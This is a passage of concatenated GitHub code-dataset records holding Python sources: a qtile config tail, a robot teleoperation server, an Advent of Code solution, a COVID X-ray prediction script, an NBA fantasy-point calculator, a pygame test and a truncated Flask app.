We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n","repo_name":"AlejandroCruz-0/dotfiles","sub_path":".config/qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13490294900","text":"import os\nimport sys\nimport subprocess\nimport time\nimport signal\nimport random\nimport logging\nimport faulthandler\nimport threading\nimport functools\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom droidlet import dashboard\nfrom droidlet.dashboard.o3dviz import O3DViz\nimport numpy as np\nfrom scipy.spatial import distance\nimport open3d as o3d\nfrom droidlet.lowlevel.hello_robot.remote.obstacle_utils import get_points_in_front, is_obstacle, get_o3d_pointcloud, get_ground_plane\n\nimport time\nimport math\n\n\nif __name__ == \"__main__\":\n # this line has to go before any imports that contain @sio.on functions\n # or else, those @sio.on calls become no-ops\n dashboard.start()\n if sys.platform == \"darwin\":\n webrtc_streaming=False\n else:\n webrtc_streaming=True\n o3dviz = O3DViz(webrtc_streaming)\n o3dviz.start()\n\nfrom droidlet.interpreter.robot import (\n dance, \n default_behaviors,\n LocoGetMemoryHandler, \n PutMemoryHandler, \n LocoInterpreter,\n)\nfrom droidlet.dialog.robot import LocoBotCapabilities\nfrom droidlet.event import sio\nfrom agents.locobot.end_to_end_semantic_scout import EndToEndSemanticScout\n\nfaulthandler.register(signal.SIGUSR1)\n\nrandom.seed(0)\nlog_formatter = logging.Formatter(\n \"%(asctime)s [%(filename)s:%(lineno)s - %(funcName)s() %(levelname)s]: %(message)s\"\n)\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.getLogger().handlers.clear()\n\n\nmover = None\n\n# TODO Cleaner way to get scout object state (semantic map + goal) in dashboard\nend_to_end_vis = None\nmodular_vis = None\n\n\n@sio.on(\"sendCommandToAgent\")\ndef get_command(sid, command):\n tokens = command.split()\n command, value = tokens[0], \" \".join(tokens[1:])\n if len(value) == 0:\n value = None\n test_command(sid, [command], value=value)\n\n@sio.on(\"logData\")\ndef log_data(sid, seconds):\n test_command(sid, [\"LOG_DATA\"], value=seconds)\n\n@sio.on(\"stopRobot\")\ndef stop_robot(sid):\n test_command(sid, [\"STOP_ROBOT\"])\n\n@sio.on(\"unstopRobot\")\ndef unstop_robot(sid):\n test_command(sid, [\"UNSTOP_ROBOT\"])\n\n\ndef test_command(sid, commands, data={\"yaw\": 0.1, \"velocity\": 0.1, \"move\": 0.3}, value=None):\n print(commands, data, value)\n move_dist = float(data['move'])\n yaw = float(data['yaw'])\n velocity = float(data['velocity'])\n\n global mover\n global end_to_end_vis\n global modular_vis\n\n if mover == None:\n return\n if value is not None:\n move_dist = value\n\n def sync():\n time.sleep(10)\n for i in range(50):\n mover.get_rgb_depth()\n\n movement = [0.0, 0.0, 0.0]\n for command in commands:\n if command == \"MOVE_FORWARD\":\n movement[0] += float(move_dist)\n print(\"action: FORWARD\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"MOVE_BACKWARD\":\n movement[0] -= float(move_dist)\n print(\"action: BACKWARD\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"MOVE_LEFT\":\n movement[2] += yaw\n print(\"action: LEFT\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == 
\"MOVE_RIGHT\":\n movement[2] -= yaw\n print(\"action: RIGHT\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"PAN_LEFT\":\n mover.bot.set_pan(mover.get_pan() + yaw)\n sync()\n elif command == \"PAN_RIGHT\":\n mover.bot.set_pan(mover.get_pan() - yaw)\n sync()\n elif command == \"TILT_UP\":\n mover.bot.set_tilt(mover.get_tilt() + yaw)\n print(\"action: TILT_UP\", mover.get_tilt() + yaw)\n sync()\n elif command == \"TILT_DOWN\":\n mover.bot.set_tilt(mover.get_tilt() - yaw)\n sync()\n elif command == \"LOG_DATA\":\n mover.log_data_start(float(value)) # in seconds\n elif command == \"STOP_ROBOT\":\n mover.stop()\n elif command == \"UNSTOP_ROBOT\":\n mover.unstop()\n elif command == \"SET_PAN\":\n print(\"action: SET_PAN\", float(value))\n mover.bot.set_pan(float(value))\n sync()\n elif command == \"SET_TILT\":\n print(\"action: SET_TILT\", float(value))\n mover.bot.set_tilt(float(value))\n sync()\n elif command == \"MOVE_ABSOLUTE\":\n xyyaw_s = value.split(',')\n xyyaw_f = [float(v) for v in xyyaw_s]\n print(\"action: MOVE_ABSOLUTE\", xyyaw_f)\n mover.move_absolute(xyyaw_f, blocking=False)\n sync()\n\n # Commands we introduce\n elif command == \"SEARCH_OBJECT_MODULAR_LEARNED\":\n if \"_\" in value.strip():\n object_goal, episode_id = [x.strip() for x in value.split(\"_\")]\n else:\n object_goal = episode_id = value.strip()\n print(\"action: SEARCH_OBJECT_MODULAR_LEARNED\", object_goal)\n mover.move_to_object(\n object_goal,\n episode_id=episode_id,\n exploration_method=\"learned\",\n blocking=False\n )\n modular_vis = True\n sync()\n elif command == \"SEARCH_OBJECT_MODULAR_HEURISTIC\":\n if \"_\" in value.strip():\n object_goal, episode_id = [x.strip() for x in value.split(\"_\")]\n else:\n object_goal = episode_id = value.strip()\n print(\"action: SEARCH_OBJECT_MODULAR_HEURISTIC\", object_goal)\n mover.move_to_object(\n object_goal,\n episode_id=episode_id,\n exploration_method=\"frontier\",\n blocking=False\n )\n modular_vis = True\n sync()\n elif command == \"SEARCH_OBJECT_END_TO_END\":\n if \"_\" in value.strip():\n object_goal, episode_id = [x.strip() for x in value.split(\"_\")]\n else:\n object_goal = episode_id = value.strip()\n print(\"action: SEARCH_OBJECT_END_TO_END\", object_goal)\n mover.slam.disable_semantic_map_update()\n scout = EndToEndSemanticScout(\n mover,\n episode_id=episode_id,\n object_goal=object_goal,\n # policy=\"robot_camera_settings_without_noise_and_coco_detector_il\", # NO DEPTH NOISE IL\n # policy=\"robot_camera_settings_without_noise_and_coco_detector_rl\", # NO DEPTH NOISE RL\n policy=\"robot_camera_settings_and_coco_detector_rl\", # WITH DEPTH NOISE \n # policy=\"original_camera_settings_and_mp3d_detector_rl\", # ORIGINAL \n )\n while not scout.finished:\n scout.step(mover)\n end_to_end_vis = scout.semantic_frame\n\n elif command == \"LOOK_AT\":\n xyz = value.split(',')\n xyz = [float(p) for p in xyz]\n print(\"action: LOOK_AT\", xyz)\n mover.look_at(xyz, turn_base=False)\n elif command == \"RESET\":\n mover.bot.set_tilt(0.)\n mover.bot.set_pan(0.)\n elif command == \"TAKE_PHOTO\":\n filename = value.strip()\n # rgb_depth = mover.get_rgb_depth()\n # rgb, depth = rgb_depth.rgb, rgb_depth.depth\n rgb, depth = mover.get_rgb_depth_optimized_for_habitat_transfer()\n plt.imsave(f\"pictures/{filename}_rgb.png\", rgb)\n plt.imsave(f\"pictures/{filename}_depth.png\", depth)\n np.save(f\"pictures/{filename}_rgb.npy\", rgb)\n np.save(f\"pictures/{filename}_depth.npy\", depth)\n\n print(command, movement)\n\n@sio.on(\"movement 
command\")\ndef test_command_web(sid, commands, data, value=None):\n test_command(sid, commands, data=data, value=value)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Pass in server device IP\")\n parser.add_argument(\n \"--ip\",\n help=\"Server device (robot) IP. Default is 0.0.0.0\",\n type=str,\n default=\"0.0.0.0\",\n )\n parser.add_argument(\n \"--backend\",\n help=\"Which backend to use: habitat (default), hellorobot\",\n type=str,\n default='habitat',\n )\n args = parser.parse_args()\n \n ip = args.ip\n backend = args.backend\n \n print(\"Connecting to robot at ip: \", ip)\n\n if backend == 'habitat':\n from droidlet.lowlevel.locobot.locobot_mover import LoCoBotMover\n mover = LoCoBotMover(ip=ip, backend='habitat')\n elif backend == 'hellorobot':\n from droidlet.lowlevel.hello_robot.hello_robot_mover import HelloRobotMover\n mover = HelloRobotMover(ip=ip)\n print(\"Mover is ready to be operated\")\n\n log_settings = {\n \"image_resolution\": 512, # pixels\n \"image_quality\": 10, # from 10 to 100, 100 being best\n }\n\n all_points = None\n all_colors = None\n first = True\n prev_stg = None\n path_count = 0\n\n start_time = time.time_ns()\n fps_freq = 1 # displays the frame rate every 1 second\n counter = 0\n if backend == 'habitat':\n mover.bot.set_pan(0.0)\n # mover.bot.set_tilt(-1.5)\n else: # hellorobot\n mover.bot.set_pan(0.0)\n # mover.bot.set_tilt(-1.05)\n\n while True:\n counter += 1\n iter_time = time.time_ns() - start_time\n if float(iter_time) / 1e9 > fps_freq :\n # print(\"FPS: \", round(counter / (float(iter_time) / 1e9), 1), \" \", int(iter_time / 1e6 / counter), \"ms\")\n counter = 0\n start_time = time.time_ns()\n\n base_state = mover.get_base_pos_in_canonical_coords()\n\n sio.emit(\"image_settings\", log_settings)\n resolution = log_settings[\"image_resolution\"]\n quality = log_settings[\"image_quality\"]\n\n # this goes from 21ms to 120ms\n rgb_depth = mover.get_rgb_depth()\n\n points, colors = rgb_depth.ptcloud.reshape(-1, 3), rgb_depth.rgb.reshape(-1, 3)\n colors = colors / 255.\n\n # TODO Temporary hack to get semantic map in dashboard\n if end_to_end_vis is not None:\n rgb_depth.rgb = end_to_end_vis[:, :, [2, 1, 0]]\n elif modular_vis is not None:\n semantic_map_vis = mover.nav.get_last_semantic_map_vis()\n semantic_map_vis.wait()\n rgb_depth.rgb = semantic_map_vis.value[:, :, [2, 1, 0]]\n\n # this takes about 1.5 to 2 fps\n serialized_image = rgb_depth.to_struct(resolution, quality)\n\n sio.emit(\"rgb\", serialized_image[\"rgb\"])\n sio.emit(\"depth\", {\n \"depthImg\": serialized_image[\"depth_img\"],\n \"depthMax\": serialized_image[\"depth_max\"],\n \"depthMin\": serialized_image[\"depth_min\"],\n })\n\n if all_points is None:\n all_points = points\n all_colors = colors\n else:\n all_points = np.concatenate((all_points, points), axis=0)\n all_colors = np.concatenate((all_colors, colors), axis=0)\n\n opcd = o3d.geometry.PointCloud()\n opcd.points = o3d.utility.Vector3dVector(all_points)\n opcd.colors = o3d.utility.Vector3dVector(all_colors)\n opcd = opcd.voxel_down_sample(0.03)\n\n all_points = np.asarray(opcd.points)\n all_colors = np.asarray(opcd.colors)\n \n o3dviz.put('pointcloud', opcd)\n # obstacle, cpcd, crop, bbox, rest = mover.is_obstacle_in_front(return_viz=True)\n # if obstacle:\n # crop.paint_uniform_color([0.0, 1.0, 1.0])\n # rest.paint_uniform_color([1.0, 0.0, 1.0])\n # else:\n # crop.paint_uniform_color([1.0, 1.0, 0.0])\n # rest.paint_uniform_color([0.0, 1.0, 0.0])\n # 
o3dviz.put(\"cpcd\", cpcd)\n # o3dviz.put(\"bbox\", bbox)\n # o3dviz.put(\"crop\", crop)\n # o3dviz.put(\"rest\", rest)\n \n # print(mover.bot.is_obstacle_in_front())\n\n # Plot the robot\n x, y, yaw = base_state.tolist()\n\n if backend == 'locobot':\n height = 0.63\n else: # hello-robot\n height = 1.41\n o3dviz.add_robot(base_state, height)\n\n # start the SLAM\n # if backend == 'habitat':\n # # mover.explore((19, 19, 0))\n\n # possible_object_goals = mover.bot.get_semantic_categories_in_scene()\n # if len(possible_object_goals) > 0:\n # object_goal = random.choice(tuple(possible_object_goals))\n # mover.move_to_object(object_goal, blocking=True)\n\n # # import sys\n # # sys.exit()\n # import os\n # os._exit(0)\n \n sio.emit(\n \"map\",\n {\"x\": x, \"y\": y, \"yaw\": yaw, \"map\": mover.get_obstacles_in_canonical_coords()},\n )\n\n # s = input('...')\n time.sleep(0.001)\n","repo_name":"facebookresearch/fairo","sub_path":"agents/locobot/teleop.py","file_name":"teleop.py","file_ext":"py","file_size_in_byte":12820,"program_lang":"python","lang":"en","doc_type":"code","stars":826,"dataset":"github-code","pt":"54"} +{"seq_id":"33061129037","text":"#!/usr/bin/python3\n\n# http://adventofcode.com/2017/day/13\n\nwith open(\"input\") as inputfile:\n\tlines = inputfile.read().splitlines()\n\tlayers = {int(x.split(\": \")[0]) : int(x.split(\": \")[1]) for x in lines}\n\tmaxdepth = max(layers.keys())\n\n\tdelay = 0\n\tcaught = True\n\n\twhile caught:\n\t\tcaught = False\t\n\t\ttime = delay\n\t\tseverity = 0\n\t\tfor depth in range(maxdepth+1):\n\t\t\tif depth in layers:\t\t\n\t\t\t\tlrange = layers[depth]\n\n\t\t\t\trtt = 2*(lrange-1) # round trip time (up and down)\n\n\t\t\t\tif time%rtt == 0:\n\t\t\t\t\tcaught = True\n\t\t\t\t\t#print(\"caught on layer\", depth, time)\n\t\t\t\t\tif delay == 0: # part 1 only\n\t\t\t\t\t\tseverity += depth*lrange\n\t\t\t\t\telse: # in part 2 we do not need the severity, so we can skip the rest of the layers\n\t\t\t\t\t\tbreak\n\t\t\t\n\t\t\ttime += 1\t\t\n\n\t\tif delay == 0:\n\t\t\tprint(\"part 1: \", severity)\n\t\t\tprint(\"Calculating part 2...\")\n\n\t\tif not caught:\n\t\t\tprint(\"part 2\", delay)\n\t\t\n\t\tdelay += 1","repo_name":"simonhessner/adventofcode-2017","sub_path":"day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38625913139","text":"import argparse\nimport numpy as np\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\nimport yaml\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom models import SiimCovidAuxModel\nfrom dataset import SiimCovidCLSTestDataset, classes\nfrom utils import seed_everything\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nparser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\"--cfg\", default='configs/seresnet152d_512_unet.yaml', type=str)\nparser.add_argument(\"--folds\", default=[0,1,2,3,4], nargs=\"+\", type=int)\nparser.add_argument(\"--batch-size\", default=8, type=int)\nparser.add_argument(\"--workers\", default=16, type=int)\nparser.add_argument(\"--ckpt_dir\", default='checkpoints_v4', type=str)\nargs = parser.parse_args()\nprint(args)\n\nSEED = 123\nseed_everything(SEED)\n\nif __name__ == \"__main__\":\n os.makedirs('predictions', exist_ok = True)\n\n with open(args.cfg) as f:\n cfg = yaml.load(f, Loader=yaml.FullLoader)\n print(cfg)\n\n test_df = 
pd.read_csv('../../dataset/siim-covid19-detection/test_meta.csv')\n\n models = {}\n for fold in args.folds:\n CHECKPOINT = '{}/{}_{}_{}_aux_fold{}.pth'.format(args.ckpt_dir, cfg['encoder_name'], cfg['aux_image_size'], cfg['decoder'], fold)\n models[fold] = SiimCovidAuxModel(\n encoder_name=cfg['encoder_name'],\n encoder_weights=None,\n decoder=cfg['decoder'],\n classes=len(classes),\n in_features=cfg['in_features'],\n decoder_channels=cfg['decoder_channels'],\n encoder_pretrained_path=None,\n encoder_pretrained_num_classes=None,\n model_pretrained_path=None, \n model_pretrained_num_classes=None,\n test_mode=True).cuda()\n models[fold].load_state_dict(torch.load(CHECKPOINT))\n models[fold].eval()\n\n test_dataset = SiimCovidCLSTestDataset(\n df=test_df,\n images_dir='../../dataset/siim-covid19-detection/images/test',\n image_size=cfg['aux_image_size'])\n \n test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.workers)\n print('Test size: {}'.format(len(test_loader.dataset)))\n\n preds = []\n imageids = []\n for ids, images, images_center_crop in tqdm(test_loader):\n images = images.cuda()\n images_center_crop = images_center_crop.cuda()\n imageids.extend(ids)\n\n pred = []\n with torch.cuda.amp.autocast(), torch.no_grad():\n for fold in args.folds:\n pred.append(torch.sigmoid(models[fold](images)))\n pred.append(torch.sigmoid(models[fold](torch.flip(images, dims=(3,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images, dims=(2,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images, dims=(2,3)).contiguous())))\n pred.append(torch.sigmoid(models[fold](images_center_crop)))\n pred.append(torch.sigmoid(models[fold](torch.flip(images_center_crop, dims=(3,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images_center_crop, dims=(2,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images_center_crop, dims=(2,3)).contiguous())))\n\n pred = torch.mean(torch.stack(pred, -1),-1).data.cpu().numpy()\n preds.append(pred)\n del pred\n\n preds = np.concatenate(preds, axis=0)\n imageids = np.array(imageids)\n\n pred_dict = dict(zip(imageids, preds))\n pred_dict_path = 'predictions/{}_{}_{}_aux_fold{}_test_pred_8tta.pth'.format(cfg['encoder_name'], cfg['aux_image_size'], cfg['decoder'], '_'.join(str(x) for x in args.folds))\n torch.save({\n 'pred_dict': pred_dict,\n }, pred_dict_path)\n","repo_name":"dungnb1333/SIIM-COVID19-Detection","sub_path":"src/classification_aux/predict_test.py","file_name":"predict_test.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"54"} +{"seq_id":"3476245416","text":"from datetime import date\n\nimport logging\nimport sys\nimport mysql.connector\n\n\nclass FantasyPointCalculator():\n\tDRAFT_DAY = \"DRAFT_DAY\"\n\tDRAFT_KINGS = \"DRAFT_KINGS\"\n\tFAN_DUEL = \"FAN_DUEL\"\n\tSTAR_STREET = \"STAR_STREET\"\n\t\n\tALL_SITES = [DRAFT_DAY, DRAFT_KINGS, STAR_STREET]\n\n\tdef __init__(self, cnx = None, site=None, season=None):\n\t\tself.site = site\n\t\tself.season = season\n\t\t\n\t\t# Use dependency injection to determine where the database connection comes from.\n\t\tif not cnx:\n\t\t\tself.cnx = mysql.connector.connect(user='fantasy', password='fantasy', host='localhost', database='basketball_reference')\n\t\telse:\n\t\t\tself.cnx = cnx\n\n\tdef read_cli(self):\n\t\tself.site = \"\"\n\t\tself.season = date.today().year\n\n\t\tfor arg in sys.argv:\n\t\t\tif arg 
== \"fantasy_point_calculator.py\":\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tpieces = arg.split(\"=\")\n\t\t\t\tif pieces[0] == \"site\":\n\t\t\t\t\tself.site = pieces[1]\n\t\t\t\telif pieces[0] == \"season\":\n\t\t\t\t\tself.season = int(pieces[1])\n\n\tdef calculate(self, stats):\n\t\tfantasy_points = 0\n\t\n\t\tif self.site == self.DRAFT_DAY:\n\t\t\tmissed_shots = (stats[\"field_goal_attempts\"] - stats[\"field_goals\"]) + (stats[\"three_point_field_goal_attempts\"] - stats[\"three_point_field_goals\"]) + (stats[\"free_throw_attempts\"] - stats[\"free_throws\"])\n\t\t\t\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.25) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 1) - (missed_shots * 0.25)\n\t\t\t\n\t\t\t# 1 point bonus for 3 pointer made\n\t\t\tfantasy_points = fantasy_points + stats[\"three_point_field_goals\"]\n\n\t\t\ttriple_or_double_double = 0\n\t\t\tcriteria = [stats[\"points\"], stats[\"total_rebounds\"], stats[\"assists\"], stats[\"steals\"], stats[\"blocks\"]]\n\t\t\tfor c in criteria:\n\t\t\t\tif c >= 10:\n\t\t\t\t\ttriple_or_double_double = triple_or_double_double + 1\n\n\t\t\tif triple_or_double_double == 2:\n\t\t\t\tfantasy_points = fantasy_points + 2\n\t\t\telif triple_or_double_double == 3:\n\t\t\t\tfantasy_points = fantasy_points + 2\n\t\t\n\t\telif self.site == self.DRAFT_KINGS:\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.25) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 0.5)\n\t\t\t\n\t\t\t# 1 point bonus for 3 pointer made\n\t\t\tfantasy_points = fantasy_points + (stats[\"three_point_field_goals\"] * 0.5)\n\n\t\t\ttriple_or_double_double = 0\n\t\t\tcriteria = [stats[\"points\"], stats[\"total_rebounds\"], stats[\"assists\"], stats[\"steals\"], stats[\"blocks\"]]\n\t\t\tfor c in criteria:\n\t\t\t\tif c >= 10:\n\t\t\t\t\ttriple_or_double_double = triple_or_double_double + 1\n\n\t\t\tif triple_or_double_double == 2:\n\t\t\t\tfantasy_points = fantasy_points + 1.5\n\t\t\telif triple_or_double_double == 3:\n\t\t\t\tfantasy_points = fantasy_points + 3\n\t\t\n\t\telif self.site == self.FAN_DUEL:\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.2) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 1)\n\t\t\n\t\telif self.site == self.STAR_STREET:\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.25) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 1)\n\t\t\t\n\t\treturn fantasy_points\n\t\n\t#################################################################################################\n\t# This function gets executed as a stand-alone script.\n\t#\n\t# It will query all entries in game_totals_basic that don't have a corresponding fantasy_points\n\t# row, compute the fantasy points for each, and insert a row into the fantasy_points table.\n\t#################################################################################################\n\tdef run(self):\n\t\tcursor = self.cnx.cursor()\n\t\tstat_list = []\n\t\tall_ids = {}\n\t\tfrom_fantasy_points = {}\n\n\t\tif self.season:\n\t\t\tquery = \"select id from game_totals_basic where season = {}\".format(self.season)\n\t\telse:\n\t\t\tquery = \"select id from game_totals_basic\"\n\n\t\ttry:\n\t\t\tlogging.info(\"Querying for all ids in 
game_totals_basic\")\n\t\t\tcursor.execute(query)\n\t\t\tfor result in cursor:\n\t\t\t\tall_ids[result[0]] = 1\n\t\t\t\n\t\t\tlogging.info(\"Querying for game_totals_basic_ids in fantasy_points for {}\".format(self.site))\n\t\t\tif self.season:\n\t\t\t\tquery = \"select game_totals_basic_id from fantasy_points where site = '{}' and season = {}\".format(\n\t\t\t\t\tself.site, self.season)\n\t\t\telse:\n\t\t\t\tquery = \"select game_totals_basic_id from fantasy_points where site = '{}'\".format(self.site)\n\n\t\t\tcursor.execute(query)\n\t\t\tfor result in cursor:\n\t\t\t\tfrom_fantasy_points[result[0]] = 1\n\t\t\t\n\t\t\tlogging.info(\"Filtering out existing ids\")\n\t\t\tvalid_ids = []\n\t\t\tfor k in from_fantasy_points:\n\t\t\t\tdel all_ids[k]\n\t\t\t\n\t\t\tfor k in all_ids:\n\t\t\t\tvalid_ids.append(k)\n\t\t\t\n\t\t\tlogging.info(\"Retrieving game_totals_basic rows that have not yet been computed for fantasy points.\")\n\t\t\t\n\t\t\tcount = 1\n\t\t\ttotal = len(valid_ids)\n\t\t\tfor id in valid_ids:\n\t\t\t\tif count % 10 == 0:\n\t\t\t\t\tlogging.info(\"Retrieved %d of %d\" % (count, total))\n\t\t\t\tcursor.execute(\"select * from game_totals_basic where id = {}\".format(id))\n\n\t\t\t\t# Collect list of stat lines that don't have fantasy points computed.\n\t\t\t\tfor (result) in cursor:\n\t\t\t\t\tstats = {}\n\t\t\t\t\n\t\t\t\t\tstats[\"id\"] = result[0]\n\t\t\t\t\tstats[\"player_id\"] = result[1]\n\t\t\t\t\tstats[\"season\"] = result[2]\n\t\t\t\t\tstats[\"game_number\"] = result[3]\n\t\t\t\t\tstats[\"field_goals\"] = result[12]\n\t\t\t\t\tstats[\"field_goal_attempts\"] = result[13]\n\t\t\t\t\tstats[\"three_point_field_goals\"] = result[15]\n\t\t\t\t\tstats[\"three_point_field_goal_attempts\"] = result[16]\n\t\t\t\t\tstats[\"free_throws\"] = result[18]\n\t\t\t\t\tstats[\"free_throw_attempts\"] = result[19]\n\t\t\t\t\tstats[\"total_rebounds\"] = result[23]\n\t\t\t\t\tstats[\"assists\"] = result[24]\n\t\t\t\t\tstats[\"steals\"] = result[25]\n\t\t\t\t\tstats[\"blocks\"] = result[26]\n\t\t\t\t\tstats[\"turnovers\"] = result[27]\n\t\t\t\t\tstats[\"points\"] = result[29]\n\t\t\t\n\t\t\t\t\tstat_list.append(stats)\n\t\t\t\t\n\t\t\t\tcount += 1\n\t\tfinally:\n\t\t\tcursor.close()\n\t\t\n\t\t# Calculate fantasy points and insert into the database.\n\t\tcount = 0\n\t\tcursor = self.cnx.cursor()\n\t\ttry:\n\t\t\tfor s in stat_list:\n\t\t\t\tfantasy_points = self.calculate(s)\n\t\n\t\t\t\tinsert_query = (\"\"\"insert into fantasy_points (game_totals_basic_id, player_id, site, season, game_number, points) \n\t\t\t\tvalues ({},'{}','{}',{},{},{})\"\"\").format(s[\"id\"], s[\"player_id\"], self.site, s[\"season\"], s[\"game_number\"], fantasy_points)\n\t\t\t\tcursor.execute(insert_query)\n\t\t\t\t\n\t\t\t\tcount += 1\n\t\t\t\t\n\t\t\t\tif count % 10 == 0:\n\t\t\t\t\tlogging.info(\"Processed {} games\".format(count))\n\t\tfinally:\n\t\t\tcursor.close()\n","repo_name":"dmaclean/dfs-python","sub_path":"nba/fantasy_point_calculator.py","file_name":"fantasy_point_calculator.py","file_ext":"py","file_size_in_byte":6352,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"18958381707","text":"import math\n\nfrom config import *\nimport pygame\n\npygame.init()\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n\nx1, y1 = [WIDTH//2, HEIGHT//2]\na, b = WIDTH//2, HEIGHT//2\nrun = True\nwhile run:\n screen.fill(\"#000011\")\n event = pygame.event.get()\n\n for ev in event:\n if ev.type == pygame.QUIT:\n run = False\n x, 
y = pygame.mouse.get_pos()\n\n cof = (y1 - y) / ((x1 - x) ** 2 + (y1 - y) ** 2) ** 0.5\n pygame.draw.circle(screen, '#645964', (100, 100), 10)\n\n pygame.draw.circle(screen, '#645964', (a, b), 10)\n\n a += round(cof, 2) * 5\n b += round(cof, 2) * 5\n\n pygame.display.set_caption(f'FPS {round(clock.get_fps())}')\n pygame.display.update()\n clock.tick(FPS)\n","repo_name":"innokent14/Panzer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28409080568","text":"import json\nimport os\nimport requests\nfrom flask import Flask, render_template, request\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, TextAreaField\nfrom wtforms.validators import DataRequired, length, Email\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n\ndb_path = \"sqlite:///\" + os.path.join(basedir, 'data.sqlite')\n\napp.config['SECRET_KEY'] = \"this_is_secret_key\"\napp.config['SQLALCHEMY_DATABASE_URI'] = db_path\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nMigrate(app, db)\n\n\nclass UserModel(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String)\n email = db.Column(db.String)\n location = db.relationship('Location', backref='user', lazy=True, uselist=False)\n\n def __init__(self, username, email, location):\n self.username = username\n self.email = email\n self.location = location\n\n def __repr__(self):\n return f\"User {self.username} with email: {self.email}\"\n\n @classmethod\n def save(cls, name, email, location):\n user = cls.query.filter_by(email=email).first()\n if user:\n user.username = name\n user.email = email\n user.location = location\n else:\n user = cls(name, email, location)\n db.session.add(user)\n db.session.commit()\n\n @classmethod\n def rm(cls, email):\n user = cls.query.filter_by(email=email).first()\n db.session.delete(user)\n db.session.commit()\n\n @classmethod\n def get(cls, email):\n return cls.query.filter_by(email=email).all()\n\n\nclass Location(db.Model):\n __tablename__ = \"locations\"\n id = db.Column(db.Integer, primary_key=True)\n address = db.Column(db.String)\n user_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"))\n\n def __init__(self, address, user_id):\n self.address = address\n self.user_id = user_id\n\n def __repr__(self):\n return f\"User {self.user_id} at address: {self.address}\"\n\n @classmethod\n def save(cls, str_address, user_id):\n address = cls.query.filter_by(user_id=user_id).first()\n if address:\n address.address = str_address\n address.user_id = user_id\n else:\n address = cls(str_address, user_id)\n db.session.add(address)\n db.session.commit()\n\n @classmethod\n def rm(cls, user_id):\n address = cls.query.filter_by(user_id=user_id).first()\n db.session.delete(address)\n db.session.commit()\n\n @classmethod\n def get(cls, user_id):\n return cls.query.filter_by(user_id=user_id).all()\n\n\nclass FormModel(db.Model):\n __tablename__ = \"messages\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n email = db.Column(db.String)\n textarea = db.Column(db.String)\n\n def __init__(self, name, email, textarea):\n self.name = name\n self.email = email\n self.textarea = textarea\n\n @classmethod\n def save(cls, name, email, textarea):\n message = 
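Two caveats in the chase logic of the test.py record above: the `cof` expression divides by the circle-to-mouse distance, which is zero the moment the cursor sits exactly on `(x1, y1)`, and the single y-based coefficient is added to both `a` and `b`, so the dot drifts at 45 degrees instead of along the mouse direction. A guarded, per-axis sketch of the intended movement:

```python
# Sketch: move (a, b) toward (x, y) at a fixed speed, guarding the zero-distance case.
def step_towards(a, b, x, y, speed=5):
    dx, dy = x - a, y - b
    dist = (dx * dx + dy * dy) ** 0.5
    if dist == 0:                 # cursor is exactly on the dot: stay put
        return a, b
    return a + speed * dx / dist, b + speed * dy / dist

print(step_towards(0.0, 0.0, 3.0, 4.0))  # (3.0, 4.0): one step of length 5 along the 3-4-5 direction
```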
